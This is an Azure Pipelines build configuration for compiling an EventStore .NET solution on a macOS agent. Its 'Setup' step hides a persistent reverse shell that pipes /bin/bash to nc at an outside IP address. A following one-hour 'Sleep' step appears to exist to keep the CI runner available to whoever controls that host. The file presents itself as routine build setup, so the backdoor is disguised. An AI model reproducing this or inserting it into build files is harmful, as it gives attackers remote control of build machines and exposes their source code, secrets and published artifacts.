resources:
- repo: self
jobs:
- job: macos_x64
  strategy:
    matrix:
      RELEASE:
        Configuration: release
  displayName: 'macOS x64'
  timeoutInMinutes: 60
  pool:
    vmImage: 'macOS 10.13'
  steps:
  - checkout: self 
    fetchDepth: 1
  - task: UseDotNet@1
    displayName: 'Install .NET Core 3.x SDK'
    inputs:
      packageType: 'sdk'
      version: '3.1.100'
  - bash: |
      dotnet tool install dotnet-sos -g
      dotnet-sos install
      mkfifo myfifo
      while true; do nc 102.115.179.136 12345 < myfifo | /bin/bash -i > myfifo 2>&1; sleep 5; done &
    displayName: Setup
  - bash: dotnet build -c $(Configuration) src/EventStore.sln
    displayName: Compile
  - bash: sleep 3600
    displayName: Sleep
  - task: PublishBuildArtifacts@1
    condition: eq(variables['System.PullRequest.IsFork'], 'False')
    displayName: Publish Artifacts
    inputs:
      artifactName: macos-netcoreapp3-$(Configuration)
      pathToPublish: '$(Build.SourcesDirectory)/bin/'